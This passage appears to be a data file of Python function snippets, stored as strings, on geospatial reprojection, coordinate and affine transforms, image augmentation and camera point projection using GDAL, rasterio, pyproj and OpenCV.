self.dataset.GetGeoTransform()\n if (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()):\n gt = gdal.GCPsToGeoTransform(self.dataset.GetGCPs())\n return gt", "def warp(\r\n self,\r\n dst_crs,\r\n resampling_method=0,\r\n num_threads=4,\r\n resolution=None,\r\n nodata=None,\r\n target_align=None,\r\n ):\r\n if target_align:\r\n transform = target_align.dataset.transform\r\n width = target_align.dataset.width\r\n height = target_align.dataset.height\r\n\r\n else:\r\n if resolution:\r\n transform, width, height = rasterio.warp.calculate_default_transform(\r\n self.dataset.crs,\r\n dst_crs,\r\n self.dataset.width,\r\n self.dataset.height,\r\n *self.dataset.bounds,\r\n resolution=resolution,\r\n )\r\n else:\r\n transform, width, height = rasterio.warp.calculate_default_transform(\r\n self.dataset.crs,\r\n dst_crs,\r\n self.dataset.width,\r\n self.dataset.height,\r\n *self.dataset.bounds,\r\n )\r\n\r\n destination = np.zeros((self.dataset.count, height, width), self.__arr.dtype)\r\n\r\n self.__arr, transform = rasterio.warp.reproject(\r\n source=self.__arr,\r\n destination=destination,\r\n src_transform=self.dataset.transform,\r\n src_crs=self.dataset.crs,\r\n src_nodata=nodata,\r\n dst_transform=transform,\r\n dst_crs=dst_crs,\r\n dst_nodata=nodata,\r\n resampling=resampling_method,\r\n num_threads=num_threads,\r\n )\r\n\r\n self.__update_dataset(dst_crs, transform, nodata=nodata)", "def transform(self, x, y):\n # return self.transform_2D(x, y)\n return self.transform_perspective(x, y)", "def transform(self, x, y, z=None, crs=wgs84, nearest=False, maskout=False):\n\n x, y = np.ma.array(x), np.ma.array(y)\n\n # First to local proj\n _crs = check_crs(crs, raise_on_error=True)\n if isinstance(_crs, pyproj.Proj):\n x, y = transform_proj(_crs, self.proj, x, y)\n elif isinstance(_crs, Grid):\n x, y = _crs.ij_to_crs(x, y, crs=self.proj)\n\n # Then to local grid\n x = (x - self.x0) / self.dx\n y = (y - self.y0) / self.dy\n\n # See if we need to round\n if nearest:\n f = np.rint if self.pixel_ref == 'center' else np.floor\n x = f(x).astype(int)\n y = f(y).astype(int)\n\n # Mask?\n if maskout:\n if self.pixel_ref == 'center':\n mask = ~((x >= -0.5) & (x < self.nx-0.5) &\n (y >= -0.5) & (y < self.ny-0.5))\n else:\n mask = ~((x >= 0) & (x < self.nx) &\n (y >= 0) & (y < self.ny))\n x = np.ma.array(x, mask=mask)\n y = np.ma.array(y, mask=mask)\n\n return x, y", "def dataTransform(self):\n # Might eventually need to account for downsampling / clipping here\n # transforms are updated in setOpts call.\n return self._dataTransform", "def _project(self):\n ghosts_w = self.input_field.topology.ghosts()\n self.input_field.data[0], self.input_field.data[1], \\\n self.input_field.data[2] = \\\n fftw2py.projection_om_3d(self.input_field.data[0],\n self.input_field.data[1],\n self.input_field.data[2], ghosts_w)", "def _apply_transform(self, img: np.ndarray): \n img = self.transform(image=img)[\"image\"]\n return img", "def _apply_transform(self, img: np.ndarray): \n img = self.transform(image=img)[\"image\"]\n return img", "def projection(self, point):\n return gs.copy(point)", "def apply_projection_transform(Xb, batch_size, image_size):\n d = image_size * 0.3 * intensity\n for i in np.random.choice(batch_size, int(batch_size * p), replace = False): \n tl_top = random.uniform(-d, d) # Top left corner, top margin\n tl_left = random.uniform(-d, d) # Top left corner, left margin\n bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin\n bl_left = random.uniform(-d, d) # Bottom left corner, left margin\n tr_top = random.uniform(-d, d) # Top right corner, top margin\n tr_right = random.uniform(-d, d) # Top right corner, right margin\n br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin\n br_right = random.uniform(-d, d) # Bottom right corner, right margin\n\n transform = ProjectiveTransform()\n transform.estimate(np.array((\n (tl_left, tl_top),\n (bl_left, image_size - bl_bottom),\n (image_size - br_right, image_size - br_bottom),\n (image_size - tr_right, tr_top)\n )), np.array((\n (0, 0),\n (0, image_size),\n (image_size, image_size),\n (image_size, 0)\n )))\n Xb[i] = warp(Xb[i], transform, output_shape=(image_size, image_size), order = 1, mode = 'edge')\n\n return Xb", "def TransformPoint(transform, x, y, z):\n result = np.matmul(transform, np.array([x, y, z, 1.]))\n return result[0], result[1], result[2]", "def transform_point(transform, x_in, y_in):\n # create point geometry from coordinates\n point = ogr.Geometry(ogr.wkbPoint)\n point.AddPoint(x_in, y_in)\n point.Transform(transform)\n\n x_out = point.GetX()\n y_out = point.GetY()\n return x_out, y_out", "def reproject_coordinates(x_in, y_in, spatial_reference_source, spatial_reference_target=None): \n if spatial_reference_target is not None:\n pass\n else:\n spatial_reference_target = osr.SpatialReference()\n spatial_reference_target.ImportFromEPSG(4326) \n pass\n \n if int(osgeo.__version__[0]) >= 3:\n # GDAL 3 changes axis order: https://github.com/OSGeo/gdal/issues/1546\n \n spatial_reference_source.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)\n spatial_reference_target.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)\n\n \n pTransform = osr.CoordinateTransformation( spatial_reference_source, spatial_reference_target)\n \n x_new,y_new, z = pTransform.TransformPoint( x_in,y_in)\n \n return x_new,y_new", "def apply_transform(transform):\n vg.shape.check(locals(), \"transform\", (4, 4))\n\n def apply(points, discard_z_coord=False, treat_input_as_vector=False):\n points, is_columnized, maybe_decolumnize = columnize(\n points, (-1, 3), name=\"points\"\n )\n\n homogenous_coordinate_value = 0 if treat_input_as_vector else 1\n padded_points = np.pad(\n points,\n ((0, 0), (0, 1)),\n mode=\"constant\",\n constant_values=homogenous_coordinate_value,\n )\n transformed_padded_points = np.dot(transform, padded_points.T).T\n transformed_points = np.delete(transformed_padded_points, 3, axis=1)\n\n result = maybe_decolumnize(transformed_points)\n if discard_z_coord:\n return result[:, 0:2] if is_columnized else result[0:2]\n else:\n return result\n\n return apply", "def geotransform(self):\n return self._geotransform", "def Reproject(x, y, in_grid = 4326, out_grid = 32737):\n \n inProj = Proj(init='epsg:'+str(in_grid))\n outProj = Proj(init='epsg:'+str(out_grid))\n \n \n x2,y2 = transform(inProj,outProj,x,y)\n \n return x2, y2", "def transform_to(self, dst_crs):\n self.nodes.transform_to(dst_crs)", "def transform_proj(p1, p2, x, y, nocopy=False):\n\n try:\n # This always makes a copy, even if projections are equivalent\n return _transform_internal(p1, p2, x, y, always_xy=True)\n except TypeError:\n if proj_is_same(p1, p2):\n if nocopy:\n return x, y\n else:\n return copy.deepcopy(x), copy.deepcopy(y)\n\n return _transform_internal(p1, p2, x, y)", "def _transform(self, dataset):\n raise NotImplementedError()", "def get_transform(ds):\n\n if 'transform' in ds.attrs:\n ds_trans = ds.attrs['transform']\n if isinstance(ds_trans, Affine):\n return ds_trans\n else:\n return Affine(*ds_trans)\n\n elif 'crs' in ds.data_vars and 'i2m' in ds.data_vars['crs'].attrs:\n transf_str = ds.data_vars['crs'].attrs['i2m']\n a = list(map(float, transf_str.split(',')))\n return Affine(a[0], a[2], a[4], a[1], a[3], a[5])\n\n else:\n resx, resy = get_resolution(ds)\n xoff = ds['x'].values.min()\n yoff = ds['y'].values.max()\n return Affine(resx, 0, xoff, 0, resy, yoff)", "def _apply_transform(self, x, transform_parameters):\n # x is a single image, so it doesn't have image number at index 0\n img_row_axis = self.row_axis - 1\n img_col_axis = self.col_axis - 1\n img_channel_axis = self.channel_axis - 1\n\n x = apply_affine_transform(x, transform_parameters.get('theta', 0),\n transform_parameters.get('tx', 0),\n transform_parameters.get('ty', 0),\n transform_parameters.get('shear', 0),\n transform_parameters.get('zx', 1),\n transform_parameters.get('zy', 1),\n row_axis=img_row_axis,\n col_axis=img_col_axis,\n channel_axis=img_channel_axis,\n fill_mode=self.fill_mode,\n cval=self.cval)\n\n if transform_parameters.get('channel_shift_intensity') is not None:\n x = apply_channel_shift(x,\n transform_parameters['channel_shift_intensity'],\n img_channel_axis)\n\n if transform_parameters.get('flip_horizontal', False):\n x = self._flip_axis(x, img_col_axis)\n\n if transform_parameters.get('flip_vertical', False):\n x = self._flip_axis(x, img_row_axis)\n\n if transform_parameters.get('brightness') is not None:\n x = apply_brightness_shift(x, transform_parameters['brightness'])\n\n return x", "def projection(self):\n return self.dataset.GetProjection() if self.dataset else None", "def reproject(point):\n wgs84 = pyproj.Proj('+init=epsg:4326')\n native = pyproj.Proj(DEM_PROJECTION)\n x, y = pyproj.transform(wgs84, native, point.x, point.y)\n return geom.Point(x, y)", "def transform(dataset):\n\n from tomviz import utils\n import scipy.ndimage\n import numpy as np\n import warnings\n\n array = dataset.active_scalars\n\n zoom = (0.5, 0.5, 1)\n result_shape = utils.zoom_shape(array, zoom)\n result = np.empty(result_shape, array.dtype, order='F')\n # Downsample the dataset x2 using order 1 spline (linear)\n warnings.filterwarnings('ignore', '.*output shape of zoom.*')\n scipy.ndimage.interpolation.zoom(array, zoom,\n output=result,\n order=1,\n mode='constant',\n cval=0.0, prefilter=False)\n\n # Set the result as the new scalars.\n dataset.active_scalars = result", "def projective_transform(self, x):\n\n x = np.asarray(x)\n # Assume no intensity column\n x0, y0, z0 = x\n\n # Camera coors to pixel coors\n u = ((x0 / z0) * self.f) + (self.sensor_size[0] // 2)\n v = ((y0 / z0) * self.f) + (self.sensor_size[1] // 2)\n\n u_min = np.min(u)\n v_min = np.min(v)\n\n n = len(u)\n u_list = []\n v_list = []\n if self.error_on_oob:\n for i in range(n):\n if (u[i] >= u_min and u[i] <= self.sensor_size[0] and v[i] >= v_min and v[i] <= self.sensor_size[1]):\n u_list.append(u[i])\n v_list.append(v[i])\n else:\n raise OutOfSensorBoundsError(\"Projected coordinate was outside the sensor\")\n else:\n for i in range(n):\n u_list.append(u[i])\n v_list.append(v[i])\n\n u = np.asarray(u_list)\n v = np.asarray(v_list)\n\n return np.vstack((u, v))", "def apply_transform(img,\n transform_matrix):\n rows,cols = img.shape[:2]\n dst = cv2.warpAffine(img,transform_matrix,(cols,rows))\n\n\n return dst", "def composed_with_transform(self, w2w_transform):\n if not w2w_transform.input_space == self.world_space:\n raise CompositionError(\n \"The transform given does not apply to \"\n \"the image's world space:\\n%s\\n\\n%s\" % \n (w2w_transform, self)\n )\n new_img = self._apply_transform(w2w_transform)\n new_img.world_space = w2w_transform.output_space\n return new_img", "def do_transform_point(transform: Transform, point: Point) -> Point:\n\n transform_mat = alloy.math.transformation_matrix_from_array(alloy.ros.transform_to_numpy(transform))\n point_np = alloy.ros.point_to_numpy(point)\n point_np = np.append(point_np, 1).reshape((4,1))\n trans_point = np.matmul(transform_mat, point_np)\n return alloy.ros.numpy_to_point(trans_point[0:3,0])", "def transform_to(self, frame):\n if self.component_type == \"healpix\":\n raise ValueError(\n \"Direct coordinate transformation between frames is not valid \"\n \"for `healpix` type catalogs. Please use the `healpix_interp_transform` \"\n \"to transform to a new frame and interpolate to the new pixel centers. \"\n \"Alternatively, you can call `healpix_to_point` to convert the healpix map \"\n \"to a point source catalog before calling this function.\"\n )\n\n new_skycoord = self.skycoord.transform_to(frame)\n self.skycoord = new_skycoord\n\n return", "def reproject_GeoGrid(geogrid_in, srs_string,\n out_xdim=None, out_ydim=None, out_geotransform=None,\n out_nodata_value=None, interp_method=None):\n src = geogrid_as_gdalInMem(geogrid_in)\n\n out_srs = osr.SpatialReference()\n assign_projection_to_srs(out_srs, srs_string)\n out_wkt = out_srs.ExportToWkt()\n\n dst_gdal_datatype = get_gdal_datatype(geogrid_in.data_array.dtype)\n\n try:\n dst = gdal.GetDriverByName('MEM').Create(\n '',\n out_xdim,\n out_ydim,\n 1,\n dst_gdal_datatype,\n )\n dst.SetGeoTransform(out_geotransform)\n dst.SetProjection(out_wkt)\n except ValueError:\n raise ValueError('Error creating dst in reproject_GeoGrid()')\n except AttributeError:\n raise ValueError('AttributeError in dst creation')\n\n\n gdal_interp_method = getGdalInterpMethod(interp_method)\n res = gdal.ReprojectImage(src,\n dst,\n src.GetProjection(),\n dst.GetProjection(),\n gdal_interp_method,\n )\n\n\n return geogrid_from_gdalInMem(dst)", "def apply_transform_to_image(self,img, transform, center=None):\n \n if center is None:\n center = (np.array(img.shape)[::-1]-1)/2.0\n \n displacement = np.dot(transform, center)\n shift = center - displacement\n \n img_tf = ndimage.interpolation.affine_transform(img, transform, offset=shift, mode=\"constant\", order=3, cval=0.0)\n return img_tf", "def apply_transform_matrix(self, img: np.ndarray, transform_matrix):\n h, w = img.shape[0], img.shape[1]\n transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)\n img = np.rollaxis(img, 2, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n\n channel_images = [scipy.ndimage.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=1,\n mode=self.fill_mode,\n cval=self.cval) for x_channel in img]\n img = np.stack(channel_images, axis=0)\n img = np.rollaxis(img, 0, 2 + 1)\n # img = apply_affine_transform(img, transform_matrix, channel_axis=2, fill_mode=self.fill_mode, cval=self.cval) # apply_transform\n return img", "def replace_current_transform_group(self, transform):\n datacopy = self._shallow_clone_dataset()\n fdata = datacopy._flat_data\n datacopy._flat_data = fdata.replace_current_transform_group(transform)\n return datacopy", "def projection(self, point):\n projected_point = self._iterate_over_factors(\"projection\", {\"point\": point})\n return projected_point", "def transform(self, coord_trans, clone=False):\n if clone:\n klone = self.clone()\n klone.transform(coord_trans)\n return klone\n\n # Depending on the input type, use the appropriate OGR routine\n # to perform the transformation.\n if isinstance(coord_trans, CoordTransform):\n capi.geom_transform(self.ptr, coord_trans.ptr)\n elif isinstance(coord_trans, SpatialReference):\n capi.geom_transform_to(self.ptr, coord_trans.ptr)\n elif isinstance(coord_trans, (int, str)):\n sr = SpatialReference(coord_trans)\n capi.geom_transform_to(self.ptr, sr.ptr)\n else:\n raise TypeError(\n \"Transform only accepts CoordTransform, \"\n \"SpatialReference, string, and integer objects.\"\n )", "def reproject_raster_dataset(src_ds, **kwargs):\n\n # checking kwargs\n spacing = kwargs.pop(\"spacing\", None)\n size = kwargs.pop(\"size\", None)\n resample = kwargs.pop(\"resample\", gdal.GRA_Bilinear)\n src_srs = kwargs.pop(\"projection_source\", None)\n dst_srs = kwargs.pop(\"projection_target\", None)\n align = kwargs.pop(\"align\", False)\n\n if spacing is None and size is None:\n raise NameError(\"Whether keyword 'spacing' or 'size' must be given\")\n\n if spacing is not None and size is not None:\n warnings.warn(\n \"both ``spacing`` and ``size`` kwargs given, ``size`` will be ignored.\",\n UserWarning,\n )\n\n # Get the GeoTransform vector\n src_geo = src_ds.GetGeoTransform()\n x_size = src_ds.RasterXSize\n y_size = src_ds.RasterYSize\n\n # get extent\n ulx = src_geo[0]\n uly = src_geo[3]\n lrx = src_geo[0] + src_geo[1] * x_size\n lry = src_geo[3] + src_geo[5] * y_size\n\n extent = np.array([[[ulx, uly], [lrx, uly]], [[ulx, lry], [lrx, lry]]])\n\n if dst_srs:\n # try to load projection from source dataset if None is given\n if src_srs is None:\n src_proj = src_ds.GetProjection()\n if not src_proj:\n raise ValueError(\n \"src_ds is missing projection information, please use ``projection_source`` kwarg and provide a fitting OSR SRS object.\"\n )\n src_srs = osr.SpatialReference()\n src_srs.ImportFromWkt(src_ds.GetProjection())\n\n # Transformation\n extent = georef.reproject(\n extent, projection_source=src_srs, projection_target=dst_srs\n )\n\n # wkt needed\n src_srs = src_srs.ExportToWkt()\n dst_srs = dst_srs.ExportToWkt()\n\n (ulx, uly, urx, ury, llx, lly, lrx, lry) = tuple(list(extent.flatten().tolist()))\n\n # align grid to destination raster or UL-corner point\n if align:\n try:\n ulx, uly = align\n except TypeError:\n pass\n\n ulx = int(max(np.floor(ulx), np.floor(llx)))\n uly = int(min(np.ceil(uly), np.ceil(ury)))\n lrx = int(min(np.ceil(lrx), np.ceil(urx)))\n lry = int(max(np.floor(lry), np.floor(lly)))\n\n # calculate cols/rows or xspacing/yspacing\n if spacing:\n try:\n x_ps, y_ps = spacing\n except TypeError:\n x_ps = spacing\n y_ps = spacing\n\n cols = int(abs(lrx - ulx) / x_ps)\n rows = int(abs(uly - lry) / y_ps)\n elif size:\n cols, rows = size\n x_ps = x_size * src_geo[1] / cols\n y_ps = y_size * abs(src_geo[5]) / rows\n\n # create destination in-memory raster\n mem_drv = gdal.GetDriverByName(\"MEM\")\n\n # and set RasterSize according ro cols/rows\n dst_ds = mem_drv.Create(\"\", cols, rows, 1, gdal.GDT_Float32)\n\n # Create the destination GeoTransform with changed x/y spacing\n dst_geo = (ulx, x_ps, src_geo[2], uly, src_geo[4], -y_ps)\n\n # apply GeoTransform to destination dataset\n dst_ds.SetGeoTransform(dst_geo)\n\n # apply Projection to destination dataset\n if dst_srs is not None:\n dst_ds.SetProjection(dst_srs)\n\n # nodata handling, need to initialize dst_ds with nodata\n src_band = src_ds.GetRasterBand(1)\n nodata = src_band.GetNoDataValue()\n dst_band = dst_ds.GetRasterBand(1)\n if nodata is not None:\n dst_band.SetNoDataValue(nodata)\n dst_band.WriteArray(np.ones((rows, cols)) * nodata)\n dst_band.FlushCache()\n\n # resample and reproject dataset\n gdal.ReprojectImage(src_ds, dst_ds, src_srs, dst_srs, resample)\n\n return dst_ds", "def _get_transform(self, transform):\n try:\n from cartopy.crs import CRS\n except ModuleNotFoundError:\n CRS = None\n cartopy = getattr(self, 'name', None) == 'proplot_cartopy'\n if (\n isinstance(transform, mtransforms.Transform)\n or CRS and isinstance(transform, CRS)\n ):\n return transform\n elif transform == 'figure':\n return self.figure.transFigure\n elif transform == 'axes':\n return self.transAxes\n elif transform == 'data':\n return PlateCarree() if cartopy else self.transData\n elif cartopy and transform == 'map':\n return self.transData\n else:\n raise ValueError(f'Unknown transform {transform!r}.')", "def __update_dataset(self, crs, transform, nodata=None):\r\n\r\n meta = {\r\n \"driver\": \"GTiff\",\r\n \"dtype\": self.__arr.dtype,\r\n \"nodata\": nodata,\r\n \"height\": self.__arr.shape[-2],\r\n \"width\": self.__arr.shape[-1],\r\n \"count\": self.__arr.shape[0],\r\n \"crs\": crs,\r\n \"transform\": transform,\r\n }\r\n\r\n memfile = MemoryFile()\r\n with memfile.open(**meta) as ds:\r\n ds.write(self.__arr)\r\n self.dataset = memfile.open()\r\n memfile.close()", "def reproject_dataset(filename):\n\n # We want to project the GeoTIFF coordinate reference system (crs)\n # to WGS84 (e.g. into the familiar Lat/Lon pairs). WGS84 is analogous\n # to EPSG:4326\n dst_crs = 'EPSG:4326'\n\n with rasterio.open(filename) as src:\n transform, width, height = rasterio.warp.calculate_default_transform(\n src.crs, dst_crs, src.width, src.height, *src.bounds)\n kwargs = src.meta.copy()\n kwargs.update({\n 'crs': dst_crs,\n 'transform': transform,\n 'width': width,\n 'height': height,\n 'compress': 'lzw'\n })\n\n out_path = filename.split('.tif')[0] + '.wgs84.tif'\n with rasterio.open(out_path, 'w', **kwargs) as dst:\n for i in range(1, src.count + 1):\n rasterio.warp.reproject(\n source=rasterio.band(src, i),\n destination=rasterio.band(dst, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=transform,\n dst_crs=dst_crs,\n resampling=rasterio.warp.Resampling.nearest)\n\n return out_path", "def project_points(X, K, R, T, distortion_flag=False, distortion_params=None):\n # Project points from 3d world coordinates to 2d image coordinates\n\n #get projection matrix\n pmatrix = projection_matrix(R, T, K)\n\n #add 4th component to points\n ones = np.ones([1,len(X[0])])\n xones=np.row_stack((X,ones))\n\n #calculate pixel coordinates\n X_camera = pmatrix.dot(xones)\n\n return X_camera", "def reproject(src_path, out_path, target_crs='EPSG:4326'):\n\n # load satdata\n satdata = load(src_path)\n\n # calculate a transform and new dimensions using our dataset's current CRS and dimensions\n transform, width, height = calculate_default_transform(satdata.crs,\n target_crs,\n satdata.width,\n satdata.height,\n *satdata.bounds)\n\n # Using a copy of the metadata from the clipped raster dataset and the transform we defined above,\n # we can write a new geoTIFF containing the reprojected and clipped raster data:\n metadata = satdata.meta.copy()\n\n # Change the CRS, transform, and dimensions in metadata to match our desired output dataset\n metadata.update({'crs':target_crs,\n 'transform':transform,\n 'width':width,\n 'height':height})\n\n # apply the transform & metadata to perform the reprojection\n with rasterio.open(out_path, 'w', **metadata) as reprojected:\n for band in range(1, satdata.count + 1):\n rasterio_reproject(\n source=rasterio.band(satdata, band),\n destination=rasterio.band(reprojected, band),\n src_transform=satdata.transform,\n src_crs=satdata.crs,\n dst_transform=transform,\n dst_crs=target_crs\n )", "def CopyTransform(transform):\n return copy.copy(transform)", "def apply_transform_on_3d_image(image: torch.Tensor, transforms: List[Callable]) -> torch.Tensor:\n for z in range(image.shape[0]):\n pil = TF.to_pil_image(image[z])\n for transform_fn in transforms:\n pil = transform_fn(pil)\n image[z] = TF.to_tensor(pil).squeeze()\n return image", "def reproject_coordinates(coordinates, inproj, outproj, flat=False):\n if flat:\n return np.array([transform(inproj, outproj, coord[0], coord[1]) for coord in coordinates]).flatten()\n return [list(transform(inproj, outproj, coord[0], coord[1])) for coord in coordinates]", "def testCalculateTransform(self):\n # Create some points in the first frame.\n z = 4.0\n self.evaluator.camera_height = z\n first_points = numpy.array(\n [[0, 0, z], [2, 0, z], [2, 5, z], [0, 5, z]], dtype=numpy.float32)\n # Create a transformation that will move the camera\n R = numpy.array([[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])\n t = numpy.array([[3.0], [-5.0], [0.0]])\n expected_result = numpy.eye(4)\n expected_result[0:3, 0:3] = R\n expected_result[0:3, 3:] = t\n # Determine where the second points would be given that.\n second_points = (numpy.matmul(\n R, first_points.transpose()) + t).transpose()\n # Create a simple intrinsic matrix to project onto a fictional camera\n intrinsic = numpy.array(\n [[1.0, 0.0, 20.0], [0.0, 1.0, 20.0], [0.0, 0.0, 1.0]])\n # Use no distortion or transformations\n rvec = numpy.zeros((3, 1))\n tvec = rvec\n distortion = numpy.zeros((5, 1))\n # Project the points into the camera\n (camera_first_points, _) = cv2.projectPoints(\n first_points, rvec, tvec, intrinsic, distortion)\n camera_first_points = camera_first_points.squeeze()\n (camera_second_points, _) = cv2.projectPoints(\n second_points, rvec, tvec, intrinsic, distortion)\n camera_second_points = camera_second_points.squeeze()\n # Using these projected points, can the object recover the correct initial transform\n result = self.evaluator._calculateTransform(\n camera_first_points, camera_second_points, intrinsic)\n # The matrix comparisions aren't reliable near zero, so check elements manually.\n for i in range(expected_result.shape[0]):\n for j in range(expected_result.shape[1]):\n result_element = result[i, j]\n expected_element = expected_result[i, j]\n self.assertAlmostEqual(result_element, expected_element, 6,\n 'Matrix element ({0:d}, {1:d}) is incorrect.'.format(i, j))", "def transform(self, X, copy=...):\n ...", "def transform(self, X, copy=...):\n ...", "def transform(self, X, copy=...):\n ...", "def project_point(self, point: Point3D) -> Point3D:\n x, y, z = point\n cam_x, cam_y, cam_z = self._pos\n x -= cam_x\n y -= cam_y\n z -= cam_z\n dx = self._cy*(self._sz*y + self._cz*x) - self._sy*z\n dy = self._sx*(self._sy*(self._sz*y + self._cz*x) + self._cy*z) + self._cx*(self._cz*y - self._sz*x)\n dz = self._cx*(self._sy*(self._sz*y + self._cz*x) + self._cy*z) - self._sx*(self._cz*y - self._sz*x)\n return self._scale * dx/dz, self._scale * dy/dz, dz", "def transform(self, R, t, scale = 1):\n\n # Build 4-by-4 projection matrix from args ----------------------------\n # This is what we are doing internally:\n # Proj = np.r_[ scale * np.c_[R, t], [[0, 0, 0, 1]] ]\n # InvProj = np.r_[ scale * np.c_[R.T, -np.dot(R.T, t)], [[0,0,0,scale]] ]\n Proj = tf_format.tf_format('4x4', R, t)\n Proj[:-1,:] *= scale\n InvProj = tf_format.tf_format('i4x4', R, t) * scale\n \n \n # Apply transformation to pts3D ---------------------------------------\n if self.pts3D is not None and self.pts3D.shape[1] > 0:\n # Use homogeneous coords\n pts3D = np.r_[self.pts3D, np.ones((1, self.pts3D.shape[1]))]\n pts3D = np.dot(Proj, pts3D)\n self.pts3D = pts3D[:3, :]\n\n # Apply transformation to cameras -------------------------------------\n # Camera poses are stored using camera-to-world transformations, we \n # need to invert the projection matrix for this to work --> \n # we use InvProj\n\n cposes = self.cam_poses\n for i in range(cposes.shape[1]):\n\n # Extract camera projection matrix\n p_cam = tf_format.tf_format('4x4', cposes[:, i])\n\n # Transform camera projection matrix\n new_p_cam = np.dot(p_cam, InvProj)\n \n # Make sure it's a true rotation!\n [u, s, vT] = np.linalg.svd(new_p_cam[:3,:3])\n cposes[:3, i] = tf_format.rodrigues( np.dot(u,vT) ).ravel()\n cposes[3:, i] = new_p_cam[:3, 3]\n\n self.cam_poses = cposes", "def transform(self, X, y=None):\n X = X.copy()\n if isinstance(self.transformation, BaseEstimator):\n X[self.columns_to_transform_] = self.transformation.transform(\n X[self.columns_to_transform_]\n )\n else:\n X[self.columns_to_transform_] = X[self.columns_to_transform_].applymap(\n self.transformation\n )\n\n return X", "def four_point_transform(image, pts):\n\n\tmax_x, max_y = np.max(pts[:, 0]).astype(np.int32), np.max(pts[:, 1]).astype(np.int32)\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[image.shape[1] - 1, 0],\n\t\t[image.shape[1] - 1, image.shape[0] - 1],\n\t\t[0, image.shape[0] - 1]], dtype=\"float32\")\n\n\twarped = cv2.warpPerspective(image, cv2.getPerspectiveTransform(dst, pts), (max_x, max_y))\n\n\treturn warped", "def _build_geotransform(self, i, j):\n assert isinstance(i, int), (\"i is not an integer\")\n assert isinstance(j, int), (\"j is not an integer\")\n x_origin, x_res, x_ignore, y_origin, y_ignore, y_res = (\n self.image_metadata.geotransform)\n # integer conversion to reduce floating point error\n new_x_origin = self._calculate_origin(x_origin, x_res, self.offset, j)\n new_y_origin = self._calculate_origin(y_origin, y_res, self.offset, i)\n geotransform = (new_x_origin, x_res, x_ignore, new_y_origin, \n y_ignore, y_res) \n return geotransform", "def project(self, point_cloud, round_px=True):\n if not isinstance(point_cloud, PointCloud) and not (isinstance(point_cloud, Point) and point_cloud.dim == 3):\n raise ValueError('Must provide PointCloud or 3D Point object for projection')\n if point_cloud.frame != self._frame:\n raise ValueError('Cannot project points in frame %s into camera with frame %s' %(point_cloud.frame, self._frame))\n\n points_proj = self.S.dot(point_cloud.data) + self.t\n if len(points_proj.shape) == 1:\n points_proj = points_proj[:, np.newaxis]\n point_depths = np.tile(points_proj[2,:], [3, 1])\n points_proj = np.divide(points_proj, point_depths)\n if round_px:\n points_proj = np.round(points_proj)\n\n if isinstance(point_cloud, Point):\n return Point(data=points_proj[:2,:].astype(np.int16), frame=self._frame)\n return ImageCoords(data=points_proj[:2,:].astype(np.int16), frame=self._frame)", "def project(self, point):\n return np.round(project(self.camera.P, point)).astype(int)", "def map(self, obj):\n if isinstance(obj, np.ndarray) and obj.ndim >= 2 and obj.shape[0] in (2,3):\n return fn.transformCoordinates(self, obj)\n else:\n return QtGui.QMatrix4x4.map(self, obj)", "def apply_projection(projection, dataset):\n out = DatasetType(name=dataset.name, attributes=dataset.attributes)\n\n for var in projection:\n target, template = out, dataset\n while var:\n name, slice_ = var.pop(0)\n candidate = template[name]\n \n # apply slice\n if slice_:\n if isinstance(candidate, BaseType):\n candidate.data = candidate[slice_]\n elif isinstance(candidate, SequenceType):\n candidate = candidate[slice_[0]]\n elif isinstance(candidate, GridType):\n candidate = candidate[slice_]\n\n # handle structures\n if isinstance(candidate, StructureType):\n # add variable to target\n if name not in target.keys():\n if var:\n # if there are more children to add we need to clear the\n # candidate so it has only explicitly added children; \n # also, Grids are degenerated into Structures\n if isinstance(candidate, GridType):\n candidate = StructureType(candidate.name, candidate.attributes)\n candidate._keys = []\n target[name] = candidate\n target, template = target[name], template[name]\n else:\n target[name] = candidate\n\n # fix sequence data, including only variables that are in the sequence\n for seq in walk(out, SequenceType):\n seq.data = get_var(dataset, seq.id)[tuple(seq.keys())].data\n\n return out", "def project(points, camera_params, theta):\n \"\"\"\n Function takes input of 3d_points, transformations and Convert 3-D points to 2-D by projecting onto images. \n Input:\n points: 3D points in world frame\n camera_params: parameters of camera corrosponding to the point\n theta: Needed For PAL camera to specify the sub camera index for the points\n Output:\n points_proj: 2D reprojected points for 3D points \n\n \"\"\"\n # Convert the 3D points to Camera Frame by rotaion followes by translation\n points_proj1 = rotate(points[:,0:3], camera_params[:, :3])\n points_proj1 += camera_params[:, 3:6]\n # FOR PAL: Converting into the Sub-camera Frame by respective rotation\n thetas = theta * np.pi / 3 \n points_proj = np.copy(points_proj1)\n points_proj[:,0] = points_proj1[:,0]*np.cos(thetas) - points_proj1[:,2]*np.sin(thetas)\n points_proj[:,2] = points_proj1[:,0]*np.sin(thetas) + points_proj1[:,2]*np.cos(thetas)\n # Avoiding Zero error\n for i in range(len(points_proj)):\n if(points_proj[i,2]==0):\n points_proj[i,0] = 0\n points_proj[i,1] = 0\n points_proj[i,2] = 1\n # 2D projection\n points_proj = points_proj[:, :2] / points_proj[:, 2, np.newaxis]\n f = camera_params[:, 6]\n k1 = camera_params[:, 7]\n k2 = camera_params[:, 8]\n n = np.sum(points_proj**2, axis=1)\n r = 1 + k1 * n + k2 * n**2\n points_proj *= (r * f)[:, np.newaxis]\n return points_proj", "def update_transform(self, transform: Optional[torchvision.transforms.Compose],\n train: bool = True) -> 'BaseDataset':\n if train:\n self.train_transform = transform\n else:\n self.val_transform = transform\n return self", "def project_drawn(cb, msg):\n stream = cb.streams[0]\n old_data = stream.data\n stream.update(data=msg['data'])\n element = stream.element\n stream.update(data=old_data)\n proj = cb.plot.projection\n if not isinstance(element, _Element) or element.crs == proj:\n return None\n crs = element.crs\n element.crs = proj\n return project(element, projection=crs)", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = 